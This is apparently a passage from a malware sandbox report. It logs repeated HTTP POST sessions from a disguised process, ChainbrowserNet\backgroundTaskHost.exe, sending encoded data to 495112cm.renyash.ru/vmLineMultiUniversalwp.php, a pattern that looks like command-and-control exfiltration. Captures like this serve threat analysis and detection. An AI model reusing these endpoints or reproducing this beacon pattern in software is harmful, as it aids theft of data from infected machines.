                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          21 | 192.168.2.4 | 49788 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:02.510622978 CET | 295 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 248156
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:02.963434935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:04.312998056 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67IV1oPL6DqIJegVW7tMZJaJ94qw86qdGrZsHm30pzWmfGdrGJ%2BGrYY4aHnOrZGcwVMmPvV0imsXFI62IQk54wir0X0pUKrfgA1mNqy0D2ralJSJPCN6hUPTcigNzylpnfyBddrK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cd23b377cf6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5051&min_rtt=1912&rtt_var=6995&sent=89&recv=258&lost=0&retrans=0&sent_bytes=25&recv_bytes=248451&delivery_rate=54020&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          22 | 192.168.2.4 | 49794 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:03.511189938 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:03.857755899 CET | 2520 | OUT | Data Raw: 54 5e 5e 55 50 5b 5a 55 5c 5b 52 58 57 5d 58 52 58 5d 5a 59 52 57 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^UP[ZU\[RXW]XRX]ZYRWQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-))#U'#+>?%!>*0>04-*<,+ 2_)!Y#!Y,
                                                                                          Jan 4, 2025 11:08:03.973232985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:04.235641956 CET | 817 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ml%2BVzVoHHqHF%2Fn6BN9CZc22Clae5eX%2FM2g%2B2%2F67pBsbalGF29QhKT3jmj7xELmeH%2B2x3i0PwbpGtXTcoL4inb%2BIN6E12e%2F1ZEQ5kS%2BwpiCHImN4Fq549dgrg4AXhU4pdjsfVxlZ5"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cd88da6f791-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9488&min_rtt=1452&rtt_var=16616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=22208&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          23 | 192.168.2.4 | 49799 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:04.361984968 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:04.717119932 CET | 2520 | OUT | Data Raw: 51 5b 5b 54 55 5a 5f 51 5c 5b 52 58 57 5f 58 5d 58 51 5a 5b 52 52 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[[TUZ_Q\[RXW_X]XQZ[RRQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E*+ +5P1U'Y(/&!:04)<;]+#[:Z)+!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:04.807271004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:05.065165043 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuUwaMaGGN8DDKVP4N1lV1UH7Gfuvuwf5Jrjfqk3QQxIU3Jyv9DQ1aiZ6zlGvtXUS46vLAspUeA0paxgJaVGpa6Owh%2FO4V6MKxy7mCAyUqlzkkbs1unzEBTRRVQCGNSZc54z8fmr"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cddce6b0cba-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1701&rtt_var=1028&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=447303&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          24 | 192.168.2.4 | 49804 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:05.280210972 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:05.639024973 CET | 2520 | OUT | Data Raw: 54 58 5e 51 55 5f 5a 5c 5c 5b 52 58 57 5d 58 5e 58 5c 5a 52 52 53 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX^QU_Z\\[RXW]X^X\ZRRSQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->@#)T2#=%Y"93.4.*S((5#Z =)!Y#!Y,
                                                                                          Jan 4, 2025 11:08:05.739275932 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:06.003534079 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yCfOkQfiI6bV%2FPZphvza%2BAWpEtrRCPNG2h36bsQxPypL06kKtY9bO6GsIeEq2b05n%2FhC9n0pZ%2Bt6poAYlTLdLuyAJo0yURXqrm9l1S2Tm6a59DtYW7ctQek9Ch%2F%2BsFWxUzRMkGM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ce398a84408-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7580&min_rtt=1624&rtt_var=12521&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=29630&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          25 | 192.168.2.4 | 49810 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:06.131302118 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:06.482825994 CET | 2520 | OUT | Data Raw: 54 58 5b 52 55 5b 5f 54 5c 5b 52 58 57 5c 58 52 58 55 5a 58 52 5d 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[RU[_T\[RXW\XRXUZXR]QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)/A#P%0+X=<!-'.Q X=+Z3_(+Z#>&Z=;!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:06.587717056 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          26 | 192.168.2.4 | 49816 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:06.848189116 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:07.201652050 CET | 1844 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:07.292663097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:07.558366060 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNY7McNDjg37rp9dnszCztpE%2BadFeDytxbGEA7feSO%2Fty6TSCci%2BqlIyh0utjSvcNhFSAmmUBiUhDI2R63RdBrgkOOcCgFPwtBug%2FlGr8rakFfVJ4hqHiY254ZpLBRbQOYFdohAd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ced4bb08c5d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2212&min_rtt=1966&rtt_var=1230&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=370652&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          27 | 192.168.2.4 | 49818 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:06.973879099 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:07.326549053 CET | 2520 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:07.449301004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:07.624203920 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sHa%2Fg4unkdzkbyT5Pl1CZmt0vkIlpm39M7xUxUhsK%2ByO5jJ%2FfHNI4Au3aNRWTzQHZnFWewM%2Fa5f2inbS3PutfXEe1Vm64FVGofm8Z90dVMR84z6cqcNONrCN72cpiJ%2FRzLonN4X"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cee399a433a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3598&min_rtt=2116&rtt_var=3758&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=104457&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          28 | 192.168.2.4 | 49825 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:07.763535023 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:08.107796907 CET | 2520 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:08.207844019 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:08.477519989 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRtFrmDuEaFp5I6XMqHBiGOsXtB3rBOFCq6vRbdcx%2FwbiycAmfxFOJZWzhyAYuegWNAN3o3swCKSLN32k28MakDMXQpchxBMRN2u9cD3PSL%2FNcg0HVCYsKQVKE5hbK73XMrMWZaP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cf308ef43a9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3380&min_rtt=1706&rtt_var=3988&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=96682&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          29 | 192.168.2.4 | 49831 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:08.642086983 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:08.998424053 CET | 2520 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:09.102413893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:09.373985052 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBgBt95lpUoOmUo3ny5sbcjVAiqrr12qAUHMf9BG%2FmA2qSH4SCeLlJh1JMgxsONs7hwqDFAZQ7FJz%2BVXvhPb21OBhnkKIPGbNlxvxSdrLbDZhntVytKxJgVp%2FoN2i6E%2FIazR7%2F0Y"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cf899e1429b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3282&min_rtt=1691&rtt_var=3817&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=101213&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          30 | 192.168.2.4 | 49836 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:09.505786896 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:09.857773066 CET | 2520 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:09.965820074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:10.229866982 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xlNP2Ob5tgd4tbHr5cTm2yzPXy%2BKIV1OcErJhkFPcv0vUbhWnpEIk49zLNku2HlcmvCj%2B2mm%2FSUUSw%2Fk2vviIwCy5iTlB2AjMqxSUQfjhKF3hEfutNS9X3B5ilLkgd8gYz1gaHDV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cfdfa9e43e7-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5191&min_rtt=2172&rtt_var=6853&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=55454&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          31 | 192.168.2.4 | 49841 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:10.369998932 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:10.717325926 CET | 2520 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:10.813812017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:11.093246937 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFGQH3yvFSZ2vfu%2B3cJSQzUc%2FE8pZSJlGgUPShBOQXF1I57pK1cNz3ZEgM9nWTVr5TLXNULz9LQ3yQzQOpHtUV3nENk1uWa%2B5ln9DprG5%2BaMBaZhVvdPHtIySHAXKPeQ%2FZ24K1sY"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d034b48438d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3867&min_rtt=1743&rtt_var=4903&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=77908&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          32 | 192.168.2.4 | 49849 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:11.327378035 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:11.686954975 CET | 2520 | OUT | Data Raw: [payload bytes omitted]
                                                                                          Jan 4, 2025 11:08:11.781033039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:12.048676968 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCMyGDAVX%2FdkitobNUE2FPDAfI3edNd3iKBSlADFh5nnUnCNVrdxuJSq3MBbRyLmcWrfU8iMkcQ2TK9natRIDJygQaiqjTZmlQNii0KG0hEdsIr0fLxFb5gbQdOysJ%2ByY40ukZZn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d0958fe8c1b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
